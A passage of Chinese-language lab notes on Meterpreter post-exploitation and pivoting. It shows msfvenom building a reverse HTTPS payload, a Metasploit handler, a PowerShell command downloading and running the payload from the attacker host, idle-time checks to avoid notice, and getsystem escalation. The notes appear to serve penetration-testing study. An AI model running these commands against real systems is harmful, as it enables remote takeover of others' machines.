Meterpreter 核心利用後功能與模組暨旋轉
Meterpreter 核心利用後功能與模組暨旋轉 攻擊機 192.168.45.242 靶機 192.168.186.223(Windows) 建立一個 payload 名稱為 met.exe 如下 msfvenom -p windows/x64/meterpreter_reverse_https LHOST=192.168.45.242 LPORT=443 -f exe -o met.exe sudo msfconsole -q 啟動 Metasploit search multi handler 並選擇 5 (use 5) use 5 後 show options 看一下如下圖,payload 是 generic/shell_reverse_tcp 先將 payload 改成 windows/x64/meterpreter_reverse_https 指令 set payload windows/x64/meterpreter_reverse_https 再 show options 看一下必要的欄位 set LHOST 192.168.45.242 & set LPORT 443 執行 run,可以看到攻擊機在本機的 443 Port 上執行了 reverse handler 假設 Windows 靶機已經有一個 4444 連線 shell 下載我們一開始建立的 met.exe,指令如下,啟動 powershell 然後 iwr 下載再 dir 看一下 powershell iwr -uri http://192.168.45.242/met.exe -Outfile met.exe dir 執行 payload met.exe 剛剛建立的 443 listen 進來了,執行 idletime 看一下閒置時間 上圖輸出表示使用者已經 27 分 14 秒沒有與系統交互,這表示使用者可能已經離開了電腦 如果 idletime 指令的結果顯示使用者離開,我們可以以此為契機執行可能會短暫顯示命令列視窗(例如CMD或PowerShell)的程式或指令。 對於幾個後利用功能,我們需要管理權限才能執行它們。 Metasploit 包含指令 getsystem,該指令嘗試自動將我們的權限提升到 NT ...